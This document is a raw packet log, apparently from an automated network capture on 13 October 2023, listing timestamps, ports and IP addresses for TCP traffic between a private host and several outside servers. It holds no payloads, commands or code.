Oct 13, 2023 15:21:15.451527119 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.451575994 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.451586008 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.451602936 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.452841043 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.453692913 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.453707933 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.453763008 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.453773022 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.453788042 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.453813076 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.455914974 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.455929995 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.455986023 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.455993891 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.456007957 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.456793070 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.458189964 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.458205938 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.458264112 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.458271027 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.458311081 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.461018085 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.461031914 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.461101055 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.461110115 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.461154938 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.463258028 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.463272095 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.463332891 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.463340044 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.463380098 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.465748072 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.465761900 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.465837002 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.465850115 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.465893030 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.468281031 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.468298912 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.468344927 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.468353033 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.468399048 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.468399048 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.470460892 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.470474958 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.470536947 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.470546007 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.470587969 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.472580910 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.472600937 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.472650051 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.472659111 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.472696066 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.474706888 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.474720001 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.474771976 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.474780083 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.474822998 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.476772070 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.476785898 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.476836920 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.476845980 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.476887941 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.478388071 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.478403091 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.478454113 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.478463888 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.478504896 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.479739904 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.479754925 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.479821920 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.479830027 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.479885101 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.481193066 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.481208086 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.481251955 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.481259108 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.481272936 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.481494904 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.483431101 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.483457088 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.483489037 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.483498096 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.483525038 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.483546019 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.484841108 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.484855890 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.484936953 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.484946966 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.484977961 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.484992027 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.486473083 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.486486912 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.486540079 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.486547947 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.486588001 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.487035036 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.487351894 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.487440109 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.487457037 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.487498999 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:15.487766981 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.487817049 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:15.487838984 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.487920046 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.488013029 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.488054991 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.488059998 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:15.488095045 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:15.488217115 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.488306046 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.488709927 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:15.488934040 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.488948107 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.489151955 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.489151955 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.489183903 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.490130901 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.490583897 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.490598917 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.490658045 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.490667105 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.490704060 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.492259979 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.492273092 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.492325068 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.492332935 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.492373943 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.493978024 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.493993998 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.494035006 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.494043112 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.494069099 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.494081020 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.495644093 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.495660067 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.495704889 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.495713949 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.495740891 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.495752096 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.497325897 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.497344971 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.497395992 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.497405052 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.497447014 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.498887062 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.498899937 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.498953104 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.498961926 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.499006033 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.501331091 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.501344919 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.501569986 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.501600027 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.501816988 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.502737999 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.502751112 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.502799034 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.502815008 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.502860069 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.504436970 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.504451036 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.504492044 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.504503012 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.504518032 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.504709959 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.505595922 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:15.505907059 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.505922079 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.505971909 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.505980015 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.506026030 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.507397890 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.507412910 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.507482052 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.507491112 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.507536888 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.509207964 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.509223938 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.509278059 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.509285927 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.509305000 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.509332895 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.509790897 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:15.510667086 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.510682106 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.510735035 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.510744095 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.510775089 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.510787010 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.799164057 CEST	80	49742	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:15.800419092 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.800430059 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.800452948 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.800590992 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.800590992 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.800622940 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.800909996 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.801878929 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.801892042 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.801966906 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.801984072 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.802026033 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.803355932 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.803373098 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.803437948 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.803447008 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.803488970 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.805428982 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.805442095 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.805499077 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.805506945 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.805553913 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.807281017 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.807316065 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.807333946 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.807341099 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.807362080 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.807384014 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.809868097 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.809891939 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.809916973 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.809925079 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.809943914 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.809967041 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.811691999 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.811721087 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.811742067 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.811748981 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.811768055 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.811791897 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.813656092 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.813692093 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.813704967 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.813714027 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.813740015 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.813751936 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.815890074 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.815916061 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.815938950 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.815947056 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.815962076 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.815993071 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.818289042 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.818418026 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.818542004 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.818638086 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.818664074 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:15.818743944 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.818758965 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.818818092 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.818826914 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.818871021 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.818870068 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:15.818897009 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.818998098 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.819046974 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:15.819153070 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.819209099 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.819756985 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.819803953 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:15.819818020 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.819860935 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:15.819941044 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.819999933 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.820055008 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.820095062 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.820138931 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:15.820138931 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:15.820151091 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.820194006 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.820310116 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:15.821094990 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.821175098 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.821223021 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:15.821254969 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.821270943 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:15.822551012 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.822563887 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.822638035 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.822647095 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.822685003 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:15.822688103 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.824809074 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.824822903 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.824886084 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.824894905 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.824937105 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.827394009 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.827405930 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.827589989 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.827620983 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.827680111 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.829659939 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.829678059 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.829730034 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.829741955 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.829777002 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.831371069 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:15.832294941 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.832308054 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.832362890 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.832372904 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.832412004 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.834892988 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.834906101 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.834968090 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.834976912 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.835043907 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.837863922 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.837877035 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.837944031 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.837975979 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.838015079 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.840353012 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.840367079 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.840425968 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.840436935 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.840480089 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.843337059 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.843349934 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.843399048 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.843408108 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.843449116 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.845345020 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.845356941 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.845406055 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.845415115 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.845455885 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.847531080 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.847544909 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:15.847596884 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:15.847604036 CEST	443	49736	45.130.41.106	192.168.2.5
